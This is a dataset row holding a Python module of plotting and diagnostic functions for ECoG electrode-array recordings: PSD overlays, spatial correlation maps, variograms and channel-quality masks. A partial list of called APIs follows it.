code stringlengths 31 1.05M | apis list | extract_api stringlengths 97 1.91M |
|---|---|---|
import numpy as np
from ecogdata.util import get_default_args
from ecogdata.util import fenced_out
from ecogdata.devices.units import nice_unit_text
from ecoglib.vis.plot_util import filled_interval, light_boxplot
from ecoglib.vis.colormaps import nancmap
from ecoglib.estimation.spatial_variance import covar_to_iqr_lines, matern_semivariogram, make_matern_label, \
plot_electrode_graph
from .signal_tools import bad_channel_mask, band_power, block_psds, logged_estimators, safe_avg_power, safe_corrcoef,\
spatial_autocovariance
from ..vis import plotters
__all__ = ['plot_psds', 'plot_electrode_graph', 'plot_avg_psds', 'plot_centered_rxx', 'plot_channel_mask',
'plot_mean_psd', 'plot_mux_columns', 'plot_rms_array', 'plot_site_corr', 'spatial_variance']
psd_colors = ["#348ABD", "#A60628"]
def plot_psds(f, gf, df, fc, title, ylims=(), root_hz=True, units='V', iqr_thresh=None):
    """Plot spectral power density estimate for each array channel
    (and possibly ground channels). Compute RMS power for the bandpass
    determined by "fc".

    Parameters
    ----------
    f : ndarray
        frequency vector
    gf : ndarray or None
        psd matrix for grounded input channels (may be None or empty)
    df : ndarray
        psd matrix for array signal channels
    fc : float
        cutoff frequency for RMS power calculation
    title : str
        plot title
    ylims : pair (optional)
        plot y-limits
    root_hz : boolean
        units normalized by 1/sqrt(Hz) (true) or 1/Hz (false)
    units : str
        signal units used in the axis label
    iqr_thresh : float (optional)
        outlier threshold (multiple of the interquartile range)

    Returns
    -------
    figure
    """
    # compute outliers based on sum power
    if not iqr_thresh:
        iqr_thresh = get_default_args(fenced_out)['thresh']
    plt = plotters.plt
    fig = plt.figure()
    fx = (f > 1) & (f < fc)
    # apply a wide-tolerance mask -- want to avoid plotting any
    # channels with zero (or negligable) power
    s_pwr = band_power(f, df, fc=fc, root_hz=root_hz)
    m = bad_channel_mask(np.log(s_pwr), iqr=iqr_thresh)
    df = df[m]
    # plot the first channel with a legend entry, the rest unlabeled
    plt.semilogy(
        f[fx], df[0, fx], color=psd_colors[0], label='sig channels'
    )
    plt.semilogy(
        f[fx], df[1:, fx].T, color=psd_colors[0], label='_nolegend_'
    )
    df_band_pwr = (df[:, fx] ** 2).mean()
    avg_d = np.sqrt(df_band_pwr * f[-1])
    plt.axhline(
        y=np.sqrt(df_band_pwr), color='chartreuse', linestyle='--',
        linewidth=4, label='sig avg RMS/$\sqrt{Hz}$'
    )
    # BUG FIX: avg_g was previously referenced whenever gf was not None,
    # but only defined when gf was also non-empty -> NameError for an
    # empty ground-channel array. Track availability with one flag.
    have_gnd = gf is not None and len(gf) > 0
    if have_gnd:
        plt.semilogy(f[fx], gf[0, fx], color=psd_colors[1], label='ground channels')
        plt.semilogy(f[fx], gf[1:, fx].T, color=psd_colors[1], label='_nolegend_')
        gf_band_pwr = (gf[:, fx] ** 2).mean()
        avg_g = np.sqrt(gf_band_pwr * f[-1])
        plt.axhline(
            y=np.sqrt(gf_band_pwr), color='k', linestyle='--', linewidth=4,
            label='gnd avg RMS/$\sqrt{Hz}$'
        )
    plt.legend(loc='upper right')
    units = nice_unit_text(units).strip('$')
    if root_hz:
        units_label = '$' + units + '/\sqrt{Hz}$'
    else:
        units_label = '$%s^{2}/Hz$' % units
    plt.ylabel(units_label)
    plt.xlabel('Hz (half-BW %d Hz)' % int(f[-1]))
    title = title + '\nSig RMS %1.2e' % avg_d
    if have_gnd:
        title = title + '; Gnd RMS %1.2e' % avg_g
    plt.title(title)
    plt.grid(which='both')
    if ylims:
        plt.ylim(ylims)
        # annotate how many channels fall below the visible range
        offscreen = df[:, fx].mean(axis=1) < ylims[0]
        if np.any(offscreen):
            plt.gca().annotate(
                '%d chans off-screen' % offscreen.sum(),
                (200, ylims[0]), xycoords='data',
                xytext=(50, 3 * ylims[0]), textcoords='data',
                arrowprops=dict(facecolor='black', shrink=0.05)
            )
    return fig
def plot_mean_psd(f, gf, df, fc, title, ylims=(), root_hz=True, units='V', iqr_thresh=None):
    """Plot the mean spectral power density estimate for array
    channels (and possibly ground channels). Compute RMS power for the
    bandpass determined by "fc". Plot outlier PSDs individually.
    Parameters
    ----------
    f : sequence
        frequency vector
    gf : ndarray
        psd matrix for grounded input channels
    df : ndarray
        psd matrix for array signal channels
    fc : float
        cutoff frequency for RMS power calculation
    title : str
        plot title
    ylims : pair (optional)
        plot y-limits
    root_hz : (boolean)
        units normalized by 1/sqrt(Hz) (true) or 1/Hz (false)
    iqr_thresh : float (optional)
        set the outlier threshold (as a multiple of the interquartile
        range)
    Returns
    -------
    figure
    """
    plt = plotters.plt
    # compute outliers based on sum power
    if not iqr_thresh:
        iqr_thresh = get_default_args(fenced_out)['thresh']
    s_pwr = band_power(f, df, fc=fc, root_hz=root_hz)
    s_pwr_mask = bad_channel_mask(np.log(s_pwr), iqr=iqr_thresh)
    ## s_pwr_mask = nut.fenced_out(np.log(s_pwr), thresh=iqr_thresh)
    ## s_pwr_mask = s_pwr_mask & (s_pwr > 0)
    s_pwr_mean = np.mean(s_pwr[s_pwr_mask])
    # mean +/- one stdev band computed in log space over inlier channels,
    # then mapped back through exp for the semilog plot
    df = np.log(df)
    s_psd_mn = np.mean(df[s_pwr_mask], axis=0)
    s_psd_stdev = np.std(df[s_pwr_mask], axis=0)
    s_psd_lo = s_psd_mn - s_psd_stdev
    s_psd_hi = s_psd_mn + s_psd_stdev
    s_psd_mn, s_psd_lo, s_psd_hi = map(np.exp, (s_psd_mn, s_psd_lo, s_psd_hi))
    avg_d = np.sqrt(s_pwr[s_pwr_mask].mean())
    fig, ln = filled_interval(
        plt.semilogy, f, s_psd_mn, (s_psd_lo, s_psd_hi), psd_colors[0]
    )
    # baseline level from the upper half of the band (used to place text)
    sig_baseline = s_psd_mn[f > f.max() / 2].mean()
    legends = [r'mean signal PSD $\pm \sigma$']
    df_o = None
    if np.any(~s_pwr_mask):
        # plot outlier channels individually and list their indices
        df_o = np.exp(df[~s_pwr_mask])
        o_lines = plt.semilogy(f, df_o.T, '#BD6734', lw=0.5)
        ln.append(o_lines[0])
        legends.append('outlier signal PSDs')
        # let's label these lines
        chan_txt = 'outlier sig chans: ' + \
            ', '.join([str(c) for c in (~s_pwr_mask).nonzero()[0]])
        y = 0.5 * (np.ceil(np.log(s_psd_mn.max())) + np.log(sig_baseline))
        plt.text(200, np.exp(y), chan_txt, fontsize=10, va='baseline')
    if gf is not None and len(gf):
        g_pwr = band_power(f, gf, fc=fc, root_hz=root_hz)
        # outlier screening needs more than one channel to make sense
        if len(g_pwr) > 1:
            g_pwr_mask = fenced_out(np.log(g_pwr), thresh=iqr_thresh)
        else:
            g_pwr_mask = np.array([True])
        g_pwr_mean = np.mean(g_pwr[g_pwr_mask])
        gf = np.log(gf)
        g_psd_mn = np.mean(gf[g_pwr_mask], axis=0)
        g_psd_stdev = np.std(gf[g_pwr_mask], axis=0)
        g_psd_lo = g_psd_mn - g_psd_stdev
        g_psd_hi = g_psd_mn + g_psd_stdev
        g_psd_mn, g_psd_lo, g_psd_hi = map(np.exp, (g_psd_mn, g_psd_lo, g_psd_hi))
        avg_g = np.sqrt(g_pwr[g_pwr_mask].mean())
        fig, g_ln = filled_interval(
            plt.semilogy, f, g_psd_mn, (g_psd_lo, g_psd_hi), psd_colors[1],
            ax=fig.axes[0]
        )
        ln.extend(g_ln)
        legends.append(r'mean grounded input $\pm \sigma$')
        if np.any(~g_pwr_mask):
            o_lines = plt.semilogy(
                f, np.exp(gf[~g_pwr_mask]).T, '#06A684', lw=0.5
            )
            ln.append(o_lines[0])
            legends.append('outlier grounded PSDs')
            chan_txt = 'outlier gnd chans: ' + \
                ', '.join([str(c) for c in (~g_pwr_mask).nonzero()[0]])
            # place the label between the signal baseline and ground mean
            y = sig_baseline ** 0.33 * g_psd_mn.mean() ** 0.67
            plt.text(200, y, chan_txt, fontsize=10, va='baseline')
    plt.legend(ln, legends, loc='upper right', fontsize=11)
    units = nice_unit_text(units).strip('$')
    if root_hz:
        units_label = '$' + units + '/\sqrt{Hz}$'
    else:
        units_label = '$%s^{2}/Hz$' % units
    plt.ylabel(units_label);
    plt.xlabel('Hz (half-BW %d Hz)' % int(f[-1]))
    if gf is not None and len(gf):
        title = title + \
            '\nGnd RMS %1.2e; Sig RMS %1.2e (to %d Hz)' % (avg_g, avg_d, fc)
    else:
        title = title + \
            '\nSig RMS %1.2e (to %d Hz)' % (avg_d, fc)
    plt.title(title)
    plt.grid(which='both')
    if ylims:
        plt.ylim(ylims)
        # note how many outlier channels fall below the visible range
        if df_o is not None:
            offscreen = df_o.mean(axis=1) < ylims[0]
            if np.any(offscreen):
                plt.gca().annotate(
                    '%d chans off-screen' % offscreen.sum(),
                    (200, ylims[0]), xycoords='data',
                    xytext=(50, 3 * ylims[0]), textcoords='data',
                    arrowprops=dict(facecolor='black', shrink=0.05)
                )
    return fig
def plot_avg_psds(ecog_chans, ground_chans, title, bsize_sec=2, Fs=1, iqr_thresh=None, units='V', **mtm_kw):
    """Compute block PSDs and produce two figures: one with all channel
    spectra overlaid and one with the mean +/- sigma spectrum and
    outliers plotted individually.

    Parameters
    ----------
    ecog_chans : ndarray
        channels x time array of signal channels
    ground_chans : ndarray or None
        channels x time array of grounded-input channels (may be empty)
    title : str
        base title for both figures
    bsize_sec : float
        PSD block size in seconds
    Fs : float
        sampling rate
    iqr_thresh : float (optional)
        outlier threshold passed through to the plot methods
    units : str
        signal units for labeling
    **mtm_kw :
        extra keyword arguments for the multitaper PSD estimator

    Returns
    -------
    fig, fig_avg : two figures
    """
    # make two plots with
    # 1) all spectra
    # 2) average +/- sigma, and outliers
    freqs, e_psds = block_psds(ecog_chans, bsize_sec, Fs, **mtm_kw)
    e_psds = logged_estimators(e_psds, sem=False)[0]
    # in-place sqrt: convert power density to amplitude/sqrt(Hz)
    np.sqrt(e_psds, e_psds)
    # BUG FIX: g_psds was unbound when no ground channels were supplied,
    # raising NameError below; default to None, which the downstream
    # plot functions handle explicitly.
    g_psds = None
    if ground_chans is not None and len(ground_chans):
        freqs, g_psds = block_psds(ground_chans, bsize_sec, Fs, **mtm_kw)
        g_psds = logged_estimators(g_psds, sem=False)[0]
        np.sqrt(g_psds, g_psds)
    ttl_str = '%s Fs=%d' % (title, round(Fs))
    # y-range: one decade above the max, spanning six decades
    ymax = 10 ** np.ceil(np.log10(e_psds.max()) + 1)
    ymin = ymax * 1e-6
    fig = plot_psds(
        freqs, g_psds, e_psds, Fs / 2, ttl_str,
        ylims=(ymin, ymax),
        iqr_thresh=iqr_thresh, units=units, root_hz=True
    )
    fig_avg = plot_mean_psd(
        freqs, g_psds, e_psds, Fs / 2, ttl_str,
        ylims=(ymin, ymax),
        iqr_thresh=iqr_thresh, units=units, root_hz=True
    )
    return fig, fig_avg
def plot_centered_rxx(data, chan_map, label, cmap='bwr', normed=True, clim=None):
    """Image the zero-centered spatial autocovariance of the array with
    marginal quartile profiles along the x and y distance axes.

    Parameters
    ----------
    data : ndarray
        channels x time array
    chan_map : ChannelMap
        electrode array map (provides pitch and geometry)
    label : str
        text appended to the figure title
    cmap : str
        colormap name (NaN cells are drawn gray)
    normed : bool
        use normalized correlation (color limits default to (-1, 1))
    clim : pair (optional)
        explicit color limits; defaults depend on `normed`

    Returns
    -------
    figure
    """
    plt = plotters.plt
    sns = plotters.sns
    from seaborn import JointGrid
    cxx = safe_corrcoef(data, 2000, normed=normed)
    n = cxx.shape[0]
    pitch = chan_map.pitch
    if np.iterable(pitch):
        pitch_x, pitch_y = pitch
    else:
        pitch_x = pitch_y = pitch
    centered_rxx = spatial_autocovariance(cxx, chan_map, mean=False)
    # distance axes in mm, centered on zero lag
    y, x = centered_rxx.shape[-2:]
    midx = int(x / 2)
    xx = (np.arange(x) - midx) * pitch_x
    midy = int(y / 2)
    yy = (np.arange(y) - midy) * pitch_y
    # centered_rxx[:,midy,midx] = 1
    with sns.axes_style('ticks'):
        # dummy scatter data: JointGrid only provides the axes layout
        jgrid = JointGrid(
            np.random.rand(50), np.random.rand(50), ratio=4,
            xlim=(xx[0], xx[-1]), ylim=(yy[0], yy[-1]), size=8
        )
    cm = nancmap(cmap, nanc=(.5, .5, .5, .5))
    ## Joint plot
    ax = jgrid.ax_joint
    if clim is None:
        clim = (-1, 1) if normed else np.percentile(centered_rxx, [2, 98])
    ax.imshow(
        np.nanmean(centered_rxx, axis=0), clim=clim, cmap=cm,
        extent=[xx[0], xx[-1], yy[0], yy[-1]]
    )
    ax.set_xlabel('Site-site distance (mm)')
    ax.set_ylabel('Site-site distance (mm)')
    ## Marginal-X
    ax = jgrid.ax_marg_x
    ax.spines['left'].set_visible(True)
    ax.yaxis.tick_left()
    plt.setp(ax.yaxis.get_majorticklines(), visible=True)
    plt.setp(ax.get_yticklabels(), visible=True)
    # arrange as samples over all x-distances
    rxx_mx = np.reshape(centered_rxx, (-1, x))
    vals = list()
    for c in rxx_mx.T:
        # quartiles over the valid (non-NaN) samples at each distance
        valid = ~np.isnan(c)
        if valid.any():
            vals.append(np.percentile(c[valid], [25, 50, 75]))
        else:
            vals.append([np.nan] * 3)
    mx_lo, mx_md, mx_hi = map(np.array, zip(*vals))
    filled_interval(
        ax.plot, xx, mx_md, (mx_lo, mx_hi), cm(0.6), ax=ax, lw=2, alpha=.6
    )
    ax.set_yticks(np.linspace(-1, 1, 6))
    ax.set_ylim(clim)
    ## Marginal-Y
    ax = jgrid.ax_marg_y
    ax.spines['top'].set_visible(True)
    ax.xaxis.tick_top()
    plt.setp(ax.xaxis.get_majorticklines(), visible=True)
    plt.setp(ax.get_xticklabels(), visible=True)
    # roll the y-distance axis to the end so rows become samples
    rxx_my = np.reshape(np.rollaxis(centered_rxx, 2).copy(), (-1, y))
    vals = list()
    for c in rxx_my.T:
        valid = ~np.isnan(c)
        if valid.any():
            vals.append(np.percentile(c[valid], [25, 50, 75]))
        else:
            vals.append([np.nan] * 3)
    my_lo, my_md, my_hi = map(np.array, zip(*vals))
    filled_interval(
        ax.plot, yy, my_md, (my_lo, my_hi), cm(0.6),
        ax=ax, lw=2, alpha=.6, fillx=True
    )
    ax.set_xticks(np.linspace(-1, 1, 6))
    plt.setp(ax.xaxis.get_ticklabels(), rotation=-90)
    ax.set_xlim(clim)
    jgrid.fig.subplots_adjust(left=0.1, bottom=.1)
    jgrid.ax_marg_x.set_title(
        'Average centered correlation map: ' + label, fontsize=12
    )
    return jgrid.fig
def spatial_variance(data, chan_map, label, normed=False):
    """Plot the empirical semivariogram of the array recording with a
    fitted Matern model, binned values, and reference variance levels.

    Parameters
    ----------
    data : ndarray
        channels x time array
    chan_map : ChannelMap
        electrode array map (provides pitch and site combinations)
    label : str
        prefix for the plot title
    normed : bool
        if True, semivariance is computed on normalized data

    Returns
    -------
    figure
    """
    plt = plotters.plt
    from seaborn import despine, xkcd_rgb
    cxx = safe_corrcoef(data, 2000, normed=normed, semivar=True)
    n = cxx.shape[0]
    cxx_pairs = cxx[np.triu_indices(n, k=1)]
    rms = safe_avg_power(data)
    # average signal variance and its standard error across channels
    var_mu = (rms ** 2).mean()
    var_se = (rms ** 2).std() / np.sqrt(len(rms))
    chan_combs = chan_map.site_combinations
    dist = chan_combs.dist
    if np.iterable(chan_map.pitch):
        pitch_x, pitch_y = chan_map.pitch
    else:
        pitch_x = pitch_y = chan_map.pitch
    # bin size ~ diagonal site spacing, rounded up to 0.1 mm
    binsize = np.ceil(10 * (pitch_x ** 2 + pitch_y ** 2) ** 0.5) / 10.0
    clrs = plt.rcParams['axes.prop_cycle'].by_key()['color']
    pts, lines = covar_to_iqr_lines(dist, cxx_pairs, binsize=binsize, linewidths=1, colors=clrs[0])
    xb, yb = pts
    # set a fairly wide range for nugget and sill
    bounds = {'nugget': (0, yb[0]), 'sill': (np.mean(yb), var_mu + 5 * var_se),
              'nu': (0.4, 10), 'theta': (0.5, None)}
    p = matern_semivariogram(
        dist, y=cxx_pairs, theta=1, nu=1, sill=var_mu, nugget=yb[0] / 5.0,
        free=('theta', 'nu', 'nugget', 'sill'), dist_limit=0.67,
        wls_mode='irls', fit_mean=True, fraction_nugget=False, bounds=bounds)
    f, ax = plt.subplots(figsize=(8, 5))
    ax.scatter(dist, cxx_pairs, s=5, color='gray', alpha=0.2, rasterized=True, label='Pairwise semivariance')
    ax.plot(*pts, color=clrs[0], ls='--', marker='o', ms=8, label='Binned semivariance')
    ax.add_collection(lines)
    ax.axhline(var_mu, lw=1, color=xkcd_rgb['reddish orange'], label='Avg signal variance', alpha=0.5)
    ax.axhline(var_mu + var_se, lw=0.5, color=xkcd_rgb['reddish orange'], linestyle='--', alpha=0.5)
    ax.axhline(var_mu - var_se, lw=0.5, color=xkcd_rgb['reddish orange'], linestyle='--', alpha=0.5)
    ax.axhline(p['nugget'], lw=2, color=xkcd_rgb['dark lavender'], alpha=0.5, label='Noise "nugget" (uV^2)')
    ax.axhline(p['sill'], lw=2, color=xkcd_rgb['teal green'], alpha=0.5, label='Spatial var. "sill" (uV^2)')
    xm = np.linspace(dist.min(), dist.max(), 100)
    model_label = 'Model: ' + make_matern_label(theta=p['theta'], nu=p['nu'])
    ax.plot(xm, matern_semivariogram(xm, **p), color=clrs[1], label=model_label)
    ax.set_xlabel('Site-site distance (mm)')
    if normed:
        units = '(normalized)'
    else:
        units = '(uV^2)'
    ax.set_ylabel('Semivariance ' + units)
    despine(fig=f)
    leg = ax.legend(loc='upper left', ncol=3, frameon=True)
    for h in leg.legendHandles:
        h.set_alpha(1)
        try:
            # only scatter handles have set_sizes/get_sizes
            h.set_sizes([15] * len(h.get_sizes()))
        except Exception:
            # BUG FIX: was a bare "except:" which also swallowed
            # KeyboardInterrupt/SystemExit; keep best-effort behavior
            # but only for ordinary exceptions
            pass
    ax.set_title(label + ' spatial variogram')
    f.tight_layout(pad=0.2)
    return f
def scatter_correlations(data, chan_map, mask, title, highlight='rows', pitch=1.0):
    """Scatter pairwise channel correlations against the pair's distance,
    optionally highlighting pairs that share MUX structure.

    One subplot is drawn per comma-separated mode in ``highlight``:

    * 'rows' -- pairs sharing a MUX row
    * 'cols' -- pairs sharing a MUX column
    * 'rows+cols' -- either of the above
    * 'rownabes' -- neighbors on a row
    * 'colnabes' -- neighbors on a column
    * 'allnabes' -- any neighbor

    Parameters
    ----------
    data : ndarray
        channels x time array
    chan_map : ChannelMap
        array map for all channels
    mask : ndarray (boolean)
        channels to include
    title : str
        figure title
    highlight : str
        comma-separated highlight mode(s), see above
    pitch : float or pair
        electrode pitch (unused; retained for backward compatibility)

    Returns
    -------
    figure
    """
    plt = plotters.plt
    # data[g_chans] = np.nan
    cxx = safe_corrcoef(data[mask], 2000)
    n = cxx.shape[0]
    cxx_pairs = cxx[np.triu_indices(n, k=1)]
    chan_combs = chan_map.subset(mask).site_combinations
    dists = chan_combs.dist
    fig = plt.figure()
    panels = highlight.split(',')
    if panels[0] == highlight:
        # single panel: plain scatter of the masked channels, no highlights
        plt.subplot(111)
        plt.scatter(
            dists, cxx_pairs, 9, label='_nolegend_', edgecolors='none', alpha=0.25, rasterized=True
        )
        fig.tight_layout()
        fig.subplots_adjust(top=0.95)
        fig.text(0.5, .96, title, fontsize=16, va='baseline', ha='center')
        return fig
    # hardwired for 16 channel muxing with grounded input on 1st chan
    mux_index = np.arange(len(data)).reshape(-1, 15).transpose()[1:]
    nrow, ncol = mux_index.shape
    mux_index -= np.arange(1, ncol + 1)
    colors = dict(rows='#E480DA', cols='#80E48A')
    # full (unmasked) correlations for the highlighting panels
    cxx = safe_corrcoef(data, 2000)
    cxx_pairs = cxx[np.triu_indices(len(cxx), k=1)]
    chan_combs = chan_map.site_combinations
    dists = chan_combs.dist
    for n, highlight in enumerate(panels):
        plt.subplot(len(panels), 1, n + 1)
        plt.scatter(
            dists, cxx_pairs, 9, edgecolor='none', label='_nolegend_', alpha=0.25, rasterized=True
        )
        if highlight in ('rows', 'rows+cols'):
            for row in mux_index:
                row = [r for r in row if mask[r]]
                if len(row) < 2:
                    continue
                subset = chan_map.subset(row)
                subcxx = cxx[row][:, row][np.triu_indices(len(row), k=1)]
                subdist = subset.site_combinations.dist
                c = plt.scatter(
                    subdist, subcxx, 20, colors['rows'],
                    edgecolor='white', label='_nolegend_'
                )
            # set label on last one
            c.set_label('row combo')
        if highlight in ('cols', 'rows+cols'):
            for col in mux_index.T:
                col = [c for c in col if mask[c]]
                if len(col) < 2:
                    continue
                subset = chan_map.subset(col)
                subcxx = cxx[col][:, col][np.triu_indices(len(col), k=1)]
                # BUG FIX: was "subset.site_combinations" (the combinations
                # object) -- must take its .dist attribute as in the
                # rows branch above
                subdist = subset.site_combinations.dist
                c = plt.scatter(
                    subdist, subcxx, 20, colors['cols'],
                    edgecolor='white', label='_nolegend_'
                )
            # set label on last one
            c.set_label('col combo')
        if highlight in ('rownabes', 'allnabes'):
            row_cxx = list()
            row_dist = list()
            for row in mux_index:
                row = [r for r in row if mask[r]]
                if len(row) < 2:
                    continue
                for i1, i2 in zip(row[:-1], row[1:]):
                    # locate the (i1, i2) pair in the combinations table
                    ii = np.where(
                        (chan_combs.p1 == min(i1, i2)) & \
                        (chan_combs.p2 == max(i1, i2))
                    )[0][0]
                    row_cxx.append(cxx_pairs[ii])
                    row_dist.append(dists[ii])
            c = plt.scatter(
                row_dist, row_cxx, 20, colors['rows'],
                edgecolor='white', label='row neighbors'
            )
        if highlight in ('colnabes', 'allnabes'):
            col_cxx = list()
            col_dist = list()
            for col in mux_index.T:
                col = [c for c in col if mask[c]]
                if len(col) < 2:
                    continue
                for i1, i2 in zip(col[:-1], col[1:]):
                    ii = np.where(
                        (chan_combs.p1 == min(i1, i2)) & \
                        (chan_combs.p2 == max(i1, i2))
                    )[0][0]
                    col_cxx.append(cxx_pairs[ii])
                    col_dist.append(dists[ii])
            c = plt.scatter(
                col_dist, col_cxx, 20, colors['cols'],
                edgecolor='white', label='col neighbors'
            )
        plt.legend(loc='best')
        ax = plt.gca()
        ax.set_xlabel('Distance (mm)')
        ax.set_ylabel('Correlation coef.')
    fig.tight_layout()
    fig.subplots_adjust(top=0.95)
    fig.text(0.5, .96, title, fontsize=16, va='baseline', ha='center')
    return fig
def plot_mux_columns(data, title, color_lims=True, units='uV'):
    """Image per-channel RMS power arranged by MUX data column.

    RMS values are reshaped to (columns, 15) and imaged column by column;
    non-finite channels are shown in a distinct color.
    """
    plt = plotters.plt
    # data[g_chans] = np.nan
    rms = safe_avg_power(data, 2000)
    if color_lims:
        finite = rms[np.isfinite(rms)]
        # basically try to clip out anything small
        finite = finite[finite > 1e-2 * np.median(finite)]
        clim = tuple(np.percentile(finite, [5., 95.]))
    else:
        clim = (np.nanmin(rms), np.nanmax(rms))
    rms = rms.reshape(-1, 15)
    fig = plt.figure()
    cm = nancmap('hot', nanc='dodgerblue')
    plt.imshow(rms.T, origin='upper', cmap=cm, clim=clim)
    cbar = plt.colorbar()
    cbar.set_label(nice_unit_text(units) + ' RMS')
    plt.title(title)
    plt.xlabel('data column')
    ax = fig.axes[0]
    ax.set_aspect('auto')
    ax.set_xticks(range(rms.shape[0]))
    return fig
def plot_rms_array(data, chan_map, title, color_lims=True, units='uV'):
    """Image per-channel RMS power embedded into the array geometry.

    Missing/NaN sites are drawn in a distinct color.
    """
    plt = plotters.plt
    rms = safe_avg_power(data, 2000)
    if color_lims:
        finite = rms[np.isfinite(rms)]
        # basically try to clip out anything small
        finite = finite[finite > 1e-2 * np.median(finite)]
        clim = tuple(np.percentile(finite, [5., 95.]))
    else:
        clim = (np.nanmin(rms), np.nanmax(rms))
    rms_arr = chan_map.embed(rms)
    # rms_arr = np.ones(chan_map.geometry)*np.nan
    # np.put(rms_arr, chan_map, rms)
    cm = nancmap('hot', nanc='dodgerblue')
    f = plt.figure()
    plt.imshow(rms_arr, origin='upper', cmap=cm, clim=clim)
    cbar = plt.colorbar()
    cbar.set_label(nice_unit_text(units) + ' RMS')
    plt.title(title)
    return f
def plot_site_corr(data, chan_map, title, bsize=2000, cmap=None, normed=True, stagger_x=False, stagger_y=False,
                   axs=None):
    """Draw the channel correlation matrix beside an electrode-graph view.

    If `axs` is None, a new two-panel figure is created; otherwise the
    supplied axes pair is used and the parent figure returned.
    """
    plt = plotters.plt
    # data[g_chans] = np.nan
    corr = safe_corrcoef(data, bsize, normed=normed)
    n_chan = corr.shape[0]
    # blank the diagonal so self-correlation doesn't dominate the scale
    corr.flat[0:n_chan * n_chan:n_chan + 1] = np.nan
    if normed:
        clim = (-1, 1)
    else:
        clim = np.percentile(corr, [2, 98])
    if cmap is None:
        import ecoglib.vis.colormaps as cmaps
        cmap = cmaps.diverging_cm(clim[0], clim[1], ((0, 0, 0), (1, 0, 0)))
    if axs is None:
        fig, axs = plt.subplots(1, 2, figsize=(12, 5))
    else:
        axs = axs.squeeze()
        fig = axs[0].figure
    corr_ax, graph_ax = axs[0], axs[1]
    image = corr_ax.imshow(corr, cmap=cmap, norm=plt.Normalize(*clim))
    cbar = plt.colorbar(image, ax=corr_ax, use_gridspec=True)
    cbar.set_label('avg corr coef')
    corr_ax.axis('image')
    plot_electrode_graph(corr, chan_map, ax=graph_ax, stagger_y=stagger_y, stagger_x=stagger_x)
    fig.subplots_adjust(top=0.9, left=0.05, right=0.95, wspace=0.1)
    fig.text(0.5, 0.92, title, ha='center', va='baseline', fontsize=20)
    return fig
def plot_channel_mask(data, chan_map, title, units='V', bsize=2000, quantiles=(50, 80), iqr=3):
    """Screen channels by log-RMS power and plot the result: a violin
    plot of the power distribution with accepted/rejected channels
    marked, and an array image of the inlier mask.

    Parameters
    ----------
    data : ndarray
        channels x time array
    chan_map : ChannelMap
        electrode array map
    title : str
        figure title
    units : str
        signal units for labeling
    bsize : int
        block size for the RMS power estimate
    quantiles : pair
        quantile range passed to the channel-mask heuristic
    iqr : float
        outlier threshold (multiple of the interquartile range)

    Returns
    -------
    f, mask : figure and boolean channel mask (True = accepted)
    """
    plt = plotters.plt
    sns = plotters.sns
    from seaborn import violinplot, xkcd_rgb
    rms = safe_avg_power(data, bsize=bsize, iqr_thresh=7)
    # screen in log-power space
    rms = np.log(rms)
    mask = bad_channel_mask(rms, quantiles=quantiles, iqr=iqr)
    f = plt.figure(figsize=(7, 4))
    ax = f.add_subplot(121)
    with sns.axes_style('whitegrid'):
        violinplot(
            np.ma.masked_invalid(rms).compressed(),
            alpha=0.5, widths=0.5, names=[' '],
            color=xkcd_rgb['amber'], orient='v'
        )
    sns.despine(ax=ax, left=True)
    # accepted channels as black '+', rejected as red '+'
    ax.plot(np.ones(mask.sum()) * 1.3, rms[mask], 'k+')
    if np.sum(~mask):
        ax.plot(np.ones(np.sum(~mask)) * 1.3, rms[~mask], 'r+')
    # relabel the (log-space) ticks with linear RMS values
    ax.set_yticklabels(['%.1f' % s for s in np.exp(ax.get_yticks())])
    ax.set_ylabel(nice_unit_text(units) + ' RMS')
    ax.set_title('Distribution of log-power')
    ax = f.add_subplot(122)
    # array image: 1 = accepted, 0 = rejected, NaN = no site
    site_mask = np.ones(chan_map.geometry) * np.nan
    site_mask.flat[chan_map.subset(mask.nonzero()[0])] = 1
    site_mask.flat[chan_map.subset((~mask).nonzero()[0])] = 0
    N = plt.cm.binary.N
    im = ax.imshow(
        site_mask,
        cmap=plt.cm.winter, norm=plt.cm.colors.BoundaryNorm([0, .5, 1], N),
        alpha=0.5, origin='upper'
    )
    cbar = plt.colorbar(im)
    cbar.set_ticks([0, 1])
    cbar.set_ticklabels(('rejected', 'accepted'))
    ax.axis('image')
    ax.set_title('Inlier electrodes')
    f.text(0.5, 0.02, title, ha='center', va='baseline', fontsize=18)
    return f, mask
def sinusoid_gain(data, ref, chan_map, log=True, **im_kws):
    """Estimate per-channel gain against a sinusoid reference by
    least-squares projection, and plot a boxplot plus an array image.
    """
    plt = plotters.plt
    # remove DC before projecting onto the reference
    data = data - data.mean(axis=-1, keepdims=1)
    ref = ref - ref.mean()
    # least-squares projection: <data, ref> / <ref, ref>
    gain = np.dot(data, ref) / np.dot(ref, ref)
    f = plt.figure(figsize=(7.5, 4))
    ax = plt.subplot2grid((1, 100), (0, 0), colspan=25)
    box_vals = np.log10(gain) if log else gain
    light_boxplot(box_vals, names=[''], mark_mean=True, box_ls='solid', ax=ax)
    ax.set_ylabel('log10 gain' if log else 'gain')
    ax = plt.subplot2grid((1, 100), (0, 25), colspan=75)
    _, cbar = chan_map.image(gain, ax=ax, **im_kws)
    cbar.set_label('array gain')
    return f
| [
"numpy.sum",
"numpy.ones",
"numpy.isnan",
"numpy.mean",
"numpy.arange",
"numpy.exp",
"ecoglib.vis.plot_util.filled_interval",
"numpy.nanmean",
"numpy.std",
"numpy.random.rand",
"numpy.isfinite",
"ecoglib.estimation.spatial_variance.make_matern_label",
"ecoglib.vis.colormaps.diverging_cm",
